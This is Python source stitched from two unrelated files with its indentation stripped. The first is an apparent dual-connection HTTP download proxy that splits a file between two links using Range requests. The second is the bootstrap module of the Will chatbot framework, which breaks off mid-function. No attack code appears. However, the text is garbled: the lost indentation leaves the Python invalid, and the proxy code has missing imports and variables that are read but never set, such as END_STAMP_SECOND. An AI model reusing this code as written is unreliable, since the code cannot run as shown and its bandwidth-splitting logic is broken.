MOBILE_RANGE_START = 0
CONTENT_LENGTH = 0
CONTENT_TYPE = ""
isSecondConnectionAvailable = True
isAcceptRanges = True
HEAD_RESPONSE_HEADERS = None
RESPONSE_DEFAULT = b""
RESPONSE_MOBILE = b""
RESPONSE = b""
LINE = "\r\n"
HEADER = LINE + LINE
class TestServerHandler:
def __init__(self, httpServerSelf):
self.assignRequestedPath(httpServerSelf.path[1:])
self.measureBandWidth()
self.assignContentInfo()
self.calculateLoadWeight()
self.sendRangeRequest()
self.pushBackToClient(httpServerSelf)
# Assign requested ip, port and file path to global variables
@staticmethod
def assignRequestedPath(requested):
global REQUESTED_IP, REQUESTED_PORT, REQUESTED_FILE
REQUESTED_IP = requested.split(":")[0]
try:
REQUESTED_PORT = int(requested.split(":")[1].split("/")[0])
except:
print("port not found")
try:
REQUESTED_FILE = requested.split("/")[1]
except:
print("requested file not found")
# Send two HEAD requests using threads
def measureBandWidth(self):
defaultThread = threading.Thread(target=self.sendHeadDefault)
mobileThread = threading.Thread(target=self.sendHeadMobile)
defaultThread.start()
mobileThread.start()
defaultThread.join()
mobileThread.join()
# Send HEAD request over default connection
def sendHeadDefault(self):
global startTimeDefault, serverTimeDefault, HEAD_RESPONSE_HEADERS
con = hc.HTTPConnection(REQUESTED_IP, REQUESTED_PORT)
startTimeDefault = self.getNow()
con.request("HEAD", "/" + REQUESTED_FILE, body=None)
response = con.getresponse()
serverTimeDefault = self.getNow()
con.close()
HEAD_RESPONSE_HEADERS = response
# return current time as timestamp
@staticmethod
def getNow():
return datetime.now(timezone.utc).timestamp()
# Send HEAD request over second connection
def sendHeadMobile(self):
global startTimeMobile, END_STAMP_SECOND, isSecondConnectionAvailable
try:
con = socket(AF_INET, SOCK_STREAM)
con.bind((SECOND_IP, SECOND_PORT))
con.connect((REQUESTED_IP, REQUESTED_PORT))
request = "HEAD / HTTP/1.1" + LINE
request += "Connection: close" + HEADER
startTimeMobile = self.getNow()
con.sendall(request.encode('ascii'))
con.recv(2048)
serverTimeMobile = self.getNow()
con.close()
except:
print("second connection is not found")
isSecondConnectionAvailable = False
@staticmethod
def assignContentInfo():
global CONTENT_LENGTH, CONTENT_TYPE, isAcceptRanges
if HEAD_RESPONSE_HEADERS.getheader("accept-ranges").lower() == "none":
isAcceptRanges = False
CONTENT_LENGTH = int(HEAD_RESPONSE_HEADERS.getheader("content-length"))
CONTENT_TYPE = HEAD_RESPONSE_HEADERS.getheader("content-type")
@staticmethod
def calculateLoadWeight():
global DEFAULT_RANGE_END, MOBILE_RANGE_START
defaultStamp = serverTimeDefault - startTimeDefault
mobileStamp = END_STAMP_SECOND - startTimeMobile
if mobileStamp != 0:
defaultLoadRate = round((mobileStamp / (defaultStamp + mobileStamp)), 2)
else:
defaultLoadRate = 1
DEFAULT_RANGE_END = round(defaultLoadRate * CONTENT_LENGTH)
MOBILE_RANGE_START = DEFAULT_RANGE_END
def sendRangeRequest(self):
global RESPONSE
defaultThread = threading.Thread(target=self.useDefault)
if isSecondConnectionAvailable and isAcceptRanges:
mobileThread = threading.Thread(target=self.useMobile)
defaultThread.start()
if isSecondConnectionAvailable and isAcceptRanges:
mobileThread.start()
defaultThread.join()
if isSecondConnectionAvailable and isAcceptRanges:
mobileThread.join()
RESPONSE = RESPONSE_DEFAULT + RESPONSE_MOBILE
@staticmethod
def useDefault():
global RESPONSE_DEFAULT
if isAcceptRanges:
rangeValue = 'bytes=0-' + str(DEFAULT_RANGE_END)
headers = {'Connection': 'Keep-Alive', 'Range': rangeValue}
else:
headers = {'Connection': 'Keep-Alive'}
con = hc.HTTPConnection(REQUESTED_IP, REQUESTED_PORT)
con.request("GET", "/" + REQUESTED_FILE, body=None, headers=headers)
response = con.getresponse()
con.close()
try:
RESPONSE_DEFAULT = response.read()
except hc.IncompleteRead as e:
RESPONSE_DEFAULT = e.partial
@staticmethod
def useMobile():
global RESPONSE_MOBILE
con = socket(AF_INET, SOCK_STREAM)
con.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
con.bind((SECOND_IP, SECOND_PORT + 1))
con.connect((REQUESTED_IP, REQUESTED_PORT))
request = "GET /" + REQUESTED_FILE + " HTTP/1.1" + LINE
request += "Connection: close" + LINE
request += "Range: bytes=" + str(MOBILE_RANGE_START) + "-" + str(CONTENT_LENGTH) + HEADER
con.sendall(request.encode("ascii"))
while True:
data = con.recv(2048)
if not data:
break
RESPONSE_MOBILE += data
con.close()
RESPONSE_MOBILE = RESPONSE_MOBILE.split(HEADER.encode("utf-8"), 1)[1]
def pushBackToClient(self, httpServerSelf):
httpServerSelf.send_response(200)
httpServerSelf.send_header('Content-type', CONTENT_TYPE)
httpServerSelf.send_header('Access-Control-Allow-Origin', '*')
httpServerSelf.send_header('Date', self.getTime())
httpServerSelf.end_headers()
httpServerSelf.wfile.write(RESPONSE)
@staticmethod
def getTime():
now = datetime.now()
stamp = mktime(now.timetuple())
return format_date_time(stamp)
|
main.py
|
# -*- coding: utf-8 -*-
import copy
import datetime
import imp
from importlib import import_module
import inspect
import logging
from multiprocessing import Process, Queue
import operator
import os
from os.path import abspath, dirname
import re
import signal
import sys
import threading
import time
import traceback
try:
from yappi import profile as yappi_profile
except:
from will.decorators import passthrough_decorator as yappi_profile
from clint.textui import colored, puts, indent
import bottle
from will import settings
from will.backends import analysis, execution, generation, io_adapters
from will.backends.io_adapters.base import Event
from will.mixins import ScheduleMixin, StorageMixin, ErrorMixin, SleepMixin,\
PluginModulesLibraryMixin, EmailMixin, PubSubMixin
from will.scheduler import Scheduler
from will.utils import show_valid, show_invalid, error, warn, note, print_head, Bunch
# Force UTF8
if sys.version_info < (3, 0):
reload(sys) # noqa
sys.setdefaultencoding('utf8')
else:
raw_input = input
# Update path
PROJECT_ROOT = abspath(os.path.join(dirname(__file__)))
PLUGINS_ROOT = abspath(os.path.join(PROJECT_ROOT, "plugins"))
TEMPLATES_ROOT = abspath(os.path.join(PROJECT_ROOT, "templates"))
PROJECT_TEMPLATE_ROOT = abspath(os.path.join(os.getcwd(), "templates"))
sys.path.append(PROJECT_ROOT)
sys.path.append(os.path.join(PROJECT_ROOT, "will"))
def yappi_aggregate(func, stats):
if hasattr(settings, "PROFILING_ENABLED") and settings.PROFILING_ENABLED:
fname = "callgrind.%s" % (func.__name__)
try:
stats.add(fname)
except IOError:
pass
stats.save("will_profiles/%s" % fname, "callgrind")
class WillBot(EmailMixin, StorageMixin, ScheduleMixin, PubSubMixin, SleepMixin,
ErrorMixin, PluginModulesLibraryMixin):
def __init__(self, **kwargs):
if "template_dirs" in kwargs:
warn("template_dirs is now depreciated")
if "plugin_dirs" in kwargs:
warn("plugin_dirs is now depreciated")
log_level = getattr(settings, 'LOGLEVEL', logging.ERROR)
logging.basicConfig(
level=log_level,
format='%(asctime)s [%(levelname)s] %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
)
# Bootstrap exit code.
self.exiting = False
# Find all the PLUGINS modules
try:
plugins = settings.PLUGINS
self.plugins_dirs = {}
except:
# We're missing settings. They handle that.
sys.exit(1)
# Set template dirs.
full_path_template_dirs = []
for t in settings.TEMPLATE_DIRS:
full_path_template_dirs.append(os.path.abspath(t))
# Add will's templates_root
if TEMPLATES_ROOT not in full_path_template_dirs:
full_path_template_dirs += [TEMPLATES_ROOT, ]
# Add this project's templates_root
if PROJECT_TEMPLATE_ROOT not in full_path_template_dirs:
full_path_template_dirs += [PROJECT_TEMPLATE_ROOT, ]
# Convert those to dirs
for plugin in plugins:
path_name = None
for mod in plugin.split('.'):
if path_name is not None:
path_name = [path_name]
file_name, path_name, description = imp.find_module(mod, path_name)
# Add, uniquely.
self.plugins_dirs[os.path.abspath(path_name)] = plugin
if os.path.exists(os.path.join(os.path.abspath(path_name), "templates")):
full_path_template_dirs.append(
os.path.join(os.path.abspath(path_name), "templates")
)
# Key by module name
self.plugins_dirs = dict(zip(self.plugins_dirs.values(), self.plugins_dirs.keys()))
# Storing here because storage hasn't been bootstrapped yet.
os.environ["WILL_TEMPLATE_DIRS_PICKLED"] =\
";;".join(full_path_template_dirs)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap(self):
print_head()
self.load_config()
self.bootstrap_storage_mixin()
self.bootstrap_pubsub_mixin()
self.bootstrap_plugins()
self.verify_plugin_settings()
started = self.verify_io()
if started:
puts("Bootstrapping complete.")
# Save help modules.
self.save("help_modules", self.help_modules)
puts("\nStarting core processes:")
# try:
# Exit handlers.
# signal.signal(signal.SIGINT, self.handle_sys_exit)
# # TODO this hangs for some reason.
# signal.signal(signal.SIGTERM, self.handle_sys_exit)
# Scheduler
self.scheduler_thread = Process(target=self.bootstrap_scheduler)
# Bottle
self.bottle_thread = Process(target=self.bootstrap_bottle)
# Event handler
self.incoming_event_thread = Process(target=self.bootstrap_event_handler)
self.io_threads = []
self.analysis_threads = []
self.generation_threads = []
with indent(2):
try:
# Start up threads.
self.bootstrap_io()
self.bootstrap_analysis()
self.bootstrap_generation()
self.bootstrap_execution()
self.scheduler_thread.start()
self.bottle_thread.start()
self.incoming_event_thread.start()
errors = self.get_startup_errors()
if len(errors) > 0:
error_message = "FYI, I ran into some problems while starting up:"
for err in errors:
error_message += "\n%s\n" % err
puts(colored.red(error_message))
self.stdin_listener_thread = False
if self.has_stdin_io_backend:
self.current_line = ""
while True:
for line in sys.stdin.readline():
if "\n" in line:
self.publish(
"message.incoming.stdin",
Event(
type="message.incoming.stdin",
content=self.current_line,
)
)
self.current_line = ""
else:
self.current_line += line
self.sleep_for_event_loop(2)
else:
while True:
time.sleep(100)
except (KeyboardInterrupt, SystemExit):
self.handle_sys_exit()
def verify_individual_setting(self, test_setting, quiet=False):
if not test_setting.get("only_if", True):
return True
if hasattr(settings, test_setting["name"][5:]):
with indent(2):
show_valid(test_setting["name"])
return True
else:
error("%(name)s... missing!" % test_setting)
with indent(2):
puts("""To obtain a %(name)s: \n%(obtain_at)s
To set your %(name)s:
1. On your local machine, add this to your virtual environment's bin/postactivate file:
export %(name)s=YOUR_ACTUAL_%(name)s
2. If you've deployed will on heroku, run
heroku config:set %(name)s=YOUR_ACTUAL_%(name)s
""" % test_setting)
return False
def load_config(self):
puts("Loading configuration...")
with indent(2):
settings.import_settings(quiet=False)
puts("")
@yappi_profile(return_callback=yappi_aggregate)
def verify_io(self):
puts("Verifying IO backends...")
missing_settings = False
missing_setting_error_messages = []
one_valid_backend = False
self.valid_io_backends = []
if not hasattr(settings, "IO_BACKENDS"):
settings.IO_BACKENDS = ["will.backends.io_adapters.shell", ]
# Try to import them all, catch errors and output trouble if we hit it.
for b in settings.IO_BACKENDS:
with indent(2):
try:
path_name = None
for mod in b.split('.'):
if path_name is not None:
path_name = [path_name]
file_name, path_name, description = imp.find_module(mod, path_name)
# show_valid("%s" % b)
module = import_module(b)
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
if (
hasattr(cls, "is_will_iobackend")
and cls.is_will_iobackend
and class_name != "IOBackend"
and class_name != "StdInOutIOBackend"
):
c = cls()
show_valid(c.friendly_name)
c.verify_settings()
one_valid_backend = True
self.valid_io_backends.append(b)
except EnvironmentError:
puts(colored.red(" ✗ %s is missing settings, and will be disabled." % b))
puts()
missing_settings = True
except Exception:
error_message = (
"IO backend %s is missing. Please either remove it \nfrom config.py "
"or WILL_IO_BACKENDS, or provide it somehow (pip install, etc)."
) % b
puts(colored.red("✗ %s" % b))
puts()
puts(error_message)
puts()
puts(traceback.format_exc())
missing_setting_error_messages.append(error_message)
missing_settings = True
if missing_settings and not one_valid_backend:
puts("")
error(
"Unable to find a valid IO backend - will has no way to talk "
"or listen!\n Quitting now, please look at the above errors!\n"
)
self.handle_sys_exit()
return False
puts()
return True
@yappi_profile(return_callback=yappi_aggregate)
def verify_analysis(self):
puts("Verifying Analysis backends...")
missing_settings = False
missing_setting_error_messages = []
one_valid_backend = False
if not hasattr(settings, "ANALYZE_BACKENDS"):
settings.ANALYZE_BACKENDS = ["will.backends.analysis.nothing", ]
# Try to import them all, catch errors and output trouble if we hit it.
for b in settings.ANALYZE_BACKENDS:
with indent(2):
try:
path_name = None
for mod in b.split('.'):
if path_name is not None:
path_name = [path_name]
file_name, path_name, description = imp.find_module(mod, path_name)
one_valid_backend = True
show_valid("%s" % b)
except ImportError:
error_message = (
"Analysis backend %s is missing. Please either remove it \nfrom config.py "
"or WILL_ANALYZE_BACKENDS, or provide it somehow (pip install, etc)."
) % b
puts(colored.red("✗ %s" % b))
puts()
puts(error_message)
puts()
puts(traceback.format_exc())
missing_setting_error_messages.append(error_message)
missing_settings = True
if missing_settings and not one_valid_backend:
puts("")
error(
"Unable to find a valid IO backend - will has no way to talk "
"or listen!\n Quitting now, please look at the above errors!\n"
)
sys.exit(1)
puts()
@yappi_profile(return_callback=yappi_aggregate)
def verify_generate(self):
puts("Verifying Generation backends...")
missing_settings = False
missing_setting_error_messages = []
one_valid_backend = False
if not hasattr(settings, "GENERATION_BACKENDS"):
settings.GENERATION_BACKENDS = ["will.backends.generation.strict_regex", ]
# Try to import them all, catch errors and output trouble if we hit it.
for b in settings.GENERATION_BACKENDS:
with indent(2):
try:
path_name = None
for mod in b.split('.'):
if path_name is not None:
path_name = [path_name]
file_name, path_name, description = imp.find_module(mod, path_name)
one_valid_backend = True
show_valid("%s" % b)
except ImportError:
error_message = (
"Generation backend %s is missing. Please either remove it \nfrom config.py "
"or WILL_GENERATION_BACKENDS, or provide it somehow (pip install, etc)."
) % b
puts(colored.red("✗ %s" % b))
puts()
puts(error_message)
puts()
puts(traceback.format_exc())
missing_setting_error_messages.append(error_message)
missing_settings = True
if missing_settings and not one_valid_backend:
puts("")
error(
"Unable to find a valid IO backend - will has no way to talk "
"or listen!\n Quitting now, please look at the above errors!\n"
)
sys.exit(1)
puts()
@yappi_profile(return_callback=yappi_aggregate)
def verify_execution(self):
puts("Verifying Execution backend...")
missing_settings = False
missing_setting_error_messages = []
one_valid_backend = False
if not hasattr(settings, "EXECUTION_BACKENDS"):
settings.EXECUTION_BACKENDS = ["will.backends.execution.all", ]
with indent(2):
for b in settings.EXECUTION_BACKENDS:
try:
path_name = None
for mod in b.split('.'):
if path_name is not None:
path_name = [path_name]
file_name, path_name, description = imp.find_module(mod, path_name)
one_valid_backend = True
show_valid("%s" % b)
except ImportError:
error_message = (
"Execution backend %s is missing. Please either remove it \nfrom config.py "
"or WILL_EXECUTION_BACKENDS, or provide it somehow (pip install, etc)."
) % b
puts(colored.red("✗ %s" % b))
puts()
puts(error_message)
puts()
puts(traceback.format_exc())
missing_setting_error_messages.append(error_message)
missing_settings = True
if missing_settings and not one_valid_backend:
puts("")
error(
"Unable to find a valid IO backend - will has no way to talk "
"or listen!\n Quitting now, please look at the above errors!\n"
)
sys.exit(1)
puts()
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_execution(self):
missing_setting_error_messages = []
self.execution_backends = []
self.running_execution_threads = []
execution_backends = getattr(settings, "EXECUTION_BACKENDS", ["will.backends.execution.all", ])
for b in execution_backends:
module = import_module(b)
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
try:
if (
hasattr(cls, "is_will_execution_backend")
and cls.is_will_execution_backend
and class_name != "ExecutionBackend"
):
c = cls(bot=self)
self.execution_backends.append(c)
show_valid("Execution: %s Backend started." % cls.__name__)
except ImportError:
error_message = (
"Execution backend %s is missing. Please either remove it \nfrom config.py "
"or WILL_EXECUTION_BACKENDS, or provide it somehow (pip install, etc)."
) % settings.EXECUTION_BACKENDS
puts(colored.red("✗ %s" % settings.EXECUTION_BACKENDS))
puts()
puts(error_message)
puts()
puts(traceback.format_exc())
missing_setting_error_messages.append(error_message)
if len(self.execution_backends) == 0:
puts("")
error(
"Unable to find a valid execution backend - will has no way to make decisions!"
"\n Quitting now, please look at the above error!\n"
)
sys.exit(1)
@yappi_profile(return_callback=yappi_aggregate)
def verify_plugin_settings(self):
puts("Verifying settings requested by plugins...")
missing_settings = False
missing_setting_error_messages = []
with indent(2):
for name, meta in self.required_settings_from_plugins.items():
if not hasattr(settings, name):
error_message = (
"%(setting_name)s is missing. It's required by the"
"%(plugin_name)s plugin's '%(function_name)s' method."
) % meta
puts(colored.red("✗ %(setting_name)s" % meta))
missing_setting_error_messages.append(error_message)
missing_settings = True
else:
show_valid("%(setting_name)s" % meta)
if missing_settings:
puts("")
warn(
"Will is missing settings required by some plugins. "
"He's starting up anyway, but you will run into errors"
" if you try to use those plugins!"
)
self.add_startup_error("\n".join(missing_setting_error_messages))
else:
puts("")
def handle_sys_exit(self, *args, **kwargs):
# if not self.exiting:
try:
sys.stdout.write("\n\nReceived shutdown, quitting threads.")
sys.stdout.flush()
self.exiting = True
if "WILL_EPHEMERAL_SECRET_KEY" in os.environ:
os.environ["WILL_SECRET_KEY"] = ""
os.environ["WILL_EPHEMERAL_SECRET_KEY"] = ""
if hasattr(self, "scheduler_thread") and self.scheduler_thread:
try:
self.scheduler_thread.terminate()
except KeyboardInterrupt:
pass
if hasattr(self, "bottle_thread") and self.bottle_thread:
try:
self.bottle_thread.terminate()
except KeyboardInterrupt:
pass
if hasattr(self, "incoming_event_thread") and self.incoming_event_thread:
try:
self.incoming_event_thread.terminate()
except KeyboardInterrupt:
pass
# if self.stdin_listener_thread:
# self.stdin_listener_thread.terminate()
self.publish("system.terminate", {})
if hasattr(self, "analysis_threads") and self.analysis_threads:
for t in self.analysis_threads:
try:
t.terminate()
except KeyboardInterrupt:
pass
if hasattr(self, "generation_threads") and self.generation_threads:
for t in self.generation_threads:
try:
t.terminate()
except KeyboardInterrupt:
pass
if hasattr(self, "running_execution_threads") and self.running_execution_threads:
for t in self.running_execution_threads:
try:
t.terminate()
except KeyboardInterrupt:
pass
except:
print("\n\n\nException while exiting!!")
import traceback
traceback.print_exc()
sys.exit(1)
while (
(hasattr(self, "scheduler_thread") and self.scheduler_thread and self.scheduler_thread and self.scheduler_thread.is_alive())
or (hasattr(self, "scheduler_thread") and self.scheduler_thread and self.bottle_thread and self.bottle_thread.is_alive())
or (hasattr(self, "scheduler_thread") and self.scheduler_thread and self.incoming_event_thread and self.incoming_event_thread.is_alive())
# or self.stdin_listener_thread.is_alive()
or any([t.is_alive() for t in self.io_threads])
or any([t.is_alive() for t in self.analysis_threads])
or any([t.is_alive() for t in self.generation_threads])
or any([t.is_alive() for t in self.running_execution_threads])
# or
# ("hipchat" in settings.CHAT_BACKENDS and xmpp_thread and xmpp_thread.is_alive())
):
sys.stdout.write(".")
sys.stdout.flush()
time.sleep(0.5)
print(". done.\n")
sys.exit(1)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_event_handler(self):
self.analysis_timeout = getattr(settings, "ANALYSIS_TIMEOUT_MS", 2000)
self.generation_timeout = getattr(settings, "GENERATION_TIMEOUT_MS", 2000)
self.pubsub.subscribe(["message.*", "analysis.*", "generation.*"])
# TODO: change this to the number of running analysis threads
num_analysis_threads = len(settings.ANALYZE_BACKENDS)
num_generation_threads = len(settings.GENERATION_BACKENDS)
analysis_threads = {}
generation_threads = {}
while True:
try:
event = self.pubsub.get_message()
if event and hasattr(event, "type"):
now = datetime.datetime.now()
logging.info("%s - %s" % (event.type, event.original_incoming_event_hash))
logging.debug("\n\n *** Event (%s): %s\n\n" % (event.type, event))
# TODO: Order by most common.
if event.type == "message.incoming":
# A message just got dropped off one of the IO Backends.
# Send it to analysis.
analysis_threads[event.original_incoming_event_hash] = {
"count": 0,
"timeout_end": now + datetime.timedelta(seconds=self.analysis_timeout / 1000),
"original_incoming_event": event,
"working_event": event,
}
self.pubsub.publish("analysis.start", event.data.original_incoming_event, reference_message=event)
elif event.type == "analysis.complete":
q = analysis_threads[event.original_incoming_event_hash]
q["working_event"].update({"analysis": event.data})
q["count"] += 1
logging.info("Analysis for %s: %s/%s" % (event.original_incoming_event_hash, q["count"], num_analysis_threads))
if q["count"] >= num_analysis_threads or now > q["timeout_end"]:
# done, move on.
generation_threads[event.original_incoming_event_hash] = {
"count": 0,
"timeout_end": (
now + datetime.timedelta(seconds=self.generation_timeout / 1000)
),
"original_incoming_event": q["original_incoming_event"],
"working_event": q["working_event"],
}
try:
del analysis_threads[event.original_incoming_event_hash]
except:
pass
self.pubsub.publish("generation.start", q["working_event"], reference_message=q["original_incoming_event"])
elif event.type == "generation.complete":
q = generation_threads[event.original_incoming_event_hash]
if not hasattr(q["working_event"], "generation_options"):
q["working_event"].generation_options = []
if hasattr(event, "data") and len(event.data) > 0:
for d in event.data:
q["working_event"].generation_options.append(d)
q["count"] += 1
logging.info("Generation for %s: %s/%s" % (event.original_incoming_event_hash, q["count"], num_generation_threads))
if q["count"] >= num_generation_threads or now > q["timeout_end"]:
# done, move on to execution.
for b in self.execution_backends:
try:
logging.info("Executing for %s on %s" % (b, event.original_incoming_event_hash))
b.handle_execution(q["working_event"])
except:
logging.critical(
"Error running %s for %s. \n\n%s\nContinuing...\n" % (
b,
event.original_incoming_event_hash,
traceback.format_exc()
)
)
break
try:
del generation_threads[event.original_incoming_event_hash]
except:
pass
elif event.type == "message.no_response":
logging.info("Publishing no response for %s" % (event.original_incoming_event_hash,))
logging.info(event.data.__dict__)
try:
self.publish("message.outgoing.%s" % event.data.backend, event)
except:
logging.critical(
"Error publishing no_response for %s. \n\n%s\nContinuing...\n" % (
event.original_incoming_event_hash,
traceback.format_exc()
)
)
pass
elif event.type == "message.not_allowed":
logging.info("Publishing not allowed for %s" % (event.original_incoming_event_hash,))
try:
self.publish("message.outgoing.%s" % event.data.backend, event)
except:
logging.critical(
"Error publishing not_allowed for %s. \n\n%s\nContinuing...\n" % (
event.original_incoming_event_hash,
traceback.format_exc()
)
)
pass
else:
self.sleep_for_event_loop()
# except KeyError:
# pass
except:
logging.exception("Error handling message")
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_storage_mixin(self):
puts("Bootstrapping storage...")
try:
self.bootstrap_storage()
# Make sure settings are there.
self.storage.verify_settings()
with indent(2):
show_valid("Bootstrapped!")
puts("")
except ImportError:
module_name = traceback.format_exc().split(" ")[-1]
error("Unable to bootstrap storage - attempting to load %s" % module_name)
puts(traceback.format_exc())
sys.exit(1)
except Exception:
error("Unable to bootstrap storage!")
puts(traceback.format_exc())
sys.exit(1)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_pubsub_mixin(self):
puts("Bootstrapping pubsub...")
try:
self.bootstrap_pubsub()
# Make sure settings are there.
self.pubsub.verify_settings()
with indent(2):
show_valid("Bootstrapped!")
puts("")
except ImportError:
module_name = traceback.format_exc().split(" ")[-1]
error("Unable to bootstrap pubsub - attempting to load %s" % module_name)
puts(traceback.format_exc())
sys.exit(1)
except Exception:
error("Unable to bootstrap pubsub!")
puts(traceback.format_exc())
sys.exit(1)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_scheduler(self):
bootstrapped = False
try:
self.save("plugin_modules_library", self._plugin_modules_library)
Scheduler.clear_locks(self)
self.scheduler = Scheduler()
for plugin_info, fn, function_name in self.periodic_tasks:
meta = fn.will_fn_metadata
self.add_periodic_task(
plugin_info["full_module_name"],
plugin_info["name"],
function_name,
meta["sched_args"],
meta["sched_kwargs"],
meta["function_name"],
)
for plugin_info, fn, function_name in self.random_tasks:
meta = fn.will_fn_metadata
self.add_random_tasks(
plugin_info["full_module_name"],
plugin_info["name"],
function_name,
meta["start_hour"],
meta["end_hour"],
meta["day_of_week"],
meta["num_times_per_day"]
)
bootstrapped = True
except Exception as e:
self.startup_error("Error bootstrapping scheduler", e)
if bootstrapped:
show_valid("Scheduler started.")
self.scheduler.start_loop(self)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_bottle(self):
bootstrapped = False
try:
for cls, function_name in self.bottle_routes:
instantiated_cls = cls(bot=self)
instantiated_fn = getattr(instantiated_cls, function_name)
bottle_route_args = {}
for k, v in instantiated_fn.will_fn_metadata.items():
if "bottle_" in k and k != "bottle_route":
bottle_route_args[k[len("bottle_"):]] = v
bottle.route(instantiated_fn.will_fn_metadata["bottle_route"], **bottle_route_args)(instantiated_fn)
bootstrapped = True
except Exception as e:
self.startup_error("Error bootstrapping bottle", e)
if bootstrapped:
show_valid("Web server started at %s." % (settings.PUBLIC_URL,))
bottle.run(host='0.0.0.0', port=settings.HTTPSERVER_PORT, server='cherrypy', quiet=True)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_io(self):
# puts("Bootstrapping IO...")
self.has_stdin_io_backend = False
self.io_backends = []
self.io_threads = []
self.stdin_io_backends = []
for b in self.valid_io_backends:
module = import_module(b)
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
try:
if (
hasattr(cls, "is_will_iobackend")
and cls.is_will_iobackend
and class_name != "IOBackend"
and class_name != "StdInOutIOBackend"
):
c = cls()
if hasattr(c, "stdin_process") and c.stdin_process:
thread = Process(
target=c._start,
args=(b,),
)
thread.start()
self.has_stdin_io_backend = True
self.io_threads.append(thread)
else:
thread = Process(
target=c._start,
args=(
b,
)
)
thread.start()
self.io_threads.append(thread)
show_valid("IO: %s Backend started." % cls.friendly_name)
except Exception as e:
self.startup_error("Error bootstrapping %s io" % b, e)
self.io_backends.append(b)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_analysis(self):
self.analysis_backends = []
self.analysis_threads = []
for b in settings.ANALYZE_BACKENDS:
module = import_module(b)
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
try:
if (
hasattr(cls, "is_will_analysisbackend")
and cls.is_will_analysisbackend
and class_name != "AnalysisBackend"
):
c = cls()
thread = Process(
target=c.start,
args=(b,),
kwargs={"bot": self},
)
thread.start()
self.analysis_threads.append(thread)
show_valid("Analysis: %s Backend started." % cls.__name__)
except Exception as e:
self.startup_error("Error bootstrapping %s io" % b, e)
self.analysis_backends.append(b)
pass
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_generation(self):
self.generation_backends = []
self.generation_threads = []
for b in settings.GENERATION_BACKENDS:
module = import_module(b)
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
try:
if (
hasattr(cls, "is_will_generationbackend")
and cls.is_will_generationbackend
and class_name != "GenerationBackend"
):
c = cls()
thread = Process(
target=c.start,
args=(b,),
kwargs={"bot": self},
)
thread.start()
self.generation_threads.append(thread)
show_valid("Generation: %s Backend started." % cls.__name__)
except Exception as e:
self.startup_error("Error bootstrapping %s io" % b, e)
self.generation_backends.append(b)
pass
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_plugins(self):
puts("Bootstrapping plugins...")
OTHER_HELP_HEADING = "Other"
plugin_modules = {}
plugin_modules_library = {}
# NOTE: You can't access self.storage here, or it will deadlock when the threads try to access redis.
with indent(2):
parent_help_text = None
for plugin_name, plugin_root in self.plugins_dirs.items():
for root, dirs, files in os.walk(plugin_root, topdown=False):
for f in files:
if f[-3:] == ".py" and f != "__init__.py":
try:
module_path = os.path.join(root, f)
path_components = module_path.split(os.sep)
module_name = path_components[-1][:-3]
full_module_name = ".".join(path_components)
# Check blacklist.
blacklisted = False
for b in settings.PLUGIN_BLACKLIST:
if b in full_module_name:
blacklisted = True
break
parent_mod = path_components[-2].split("/")[-1]
parent_help_text = parent_mod.title()
# Don't even *try* to load a blacklisted module.
if not blacklisted:
try:
plugin_modules[full_module_name] = imp.load_source(module_name, module_path)
parent_root = os.path.join(root, "__init__.py")
parent = imp.load_source(parent_mod, parent_root)
parent_help_text = getattr(parent, "MODULE_DESCRIPTION", parent_help_text)
except:
# If it's blacklisted, don't worry if this blows up.
if blacklisted:
pass
else:
raise
plugin_modules_library[full_module_name] = {
"full_module_name": full_module_name,
"file_path": module_path,
"name": module_name,
"parent_name": plugin_name,
"parent_module_name": parent_mod,
"parent_help_text": parent_help_text,
"blacklisted": blacklisted,
}
except Exception as e:
self.startup_error("Error loading %s" % (module_path,), e)
self.plugins = []
for name, module in plugin_modules.items():
try:
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
try:
if hasattr(cls, "is_will_plugin") and cls.is_will_plugin and class_name != "WillPlugin":
self.plugins.append({
"name": class_name,
"class": cls,
"module": module,
"full_module_name": name,
"parent_name": plugin_modules_library[name]["parent_name"],
"parent_path": plugin_modules_library[name]["file_path"],
"parent_module_name": plugin_modules_library[name]["parent_module_name"],
"parent_help_text": plugin_modules_library[name]["parent_help_text"],
"blacklisted": plugin_modules_library[name]["blacklisted"],
})
except Exception as e:
self.startup_error("Error bootstrapping %s" % (class_name,), e)
except Exception as e:
self.startup_error("Error bootstrapping %s" % (name,), e)
self._plugin_modules_library = plugin_modules_library
# Sift and Sort.
self.message_listeners = {}
self.periodic_tasks = []
self.random_tasks = []
self.bottle_routes = []
self.all_listener_regexes = []
self.help_modules = {}
self.help_modules[OTHER_HELP_HEADING] = []
self.some_listeners_include_me = False
self.plugins.sort(key=operator.itemgetter("parent_module_name"))
self.required_settings_from_plugins = {}
last_parent_name = None
for plugin_info in self.plugins:
try:
if last_parent_name != plugin_info["parent_help_text"]:
friendly_name = "%(parent_help_text)s " % plugin_info
module_name = " %(parent_name)s" % plugin_info
# Justify
friendly_name = friendly_name.ljust(50, '-')
module_name = module_name.rjust(40, '-')
puts("")
puts("%s%s" % (friendly_name, module_name))
last_parent_name = plugin_info["parent_help_text"]
with indent(2):
plugin_name = plugin_info["name"]
plugin_warnings = []
# Just a little nicety
if plugin_name[-6:] == "Plugin":
plugin_name = plugin_name[:-6]
if plugin_info["blacklisted"]:
puts("✗ %s (blacklisted)" % plugin_name)
else:
plugin_instances = {}
for function_name, fn in inspect.getmembers(
plugin_info["class"],
predicate=lambda x: inspect.ismethod(x) or inspect.isfunction(x)
):
try:
# Check for required_settings
with indent(2):
if hasattr(fn, "will_fn_metadata"):
meta = fn.will_fn_metadata
if "warnings" in meta:
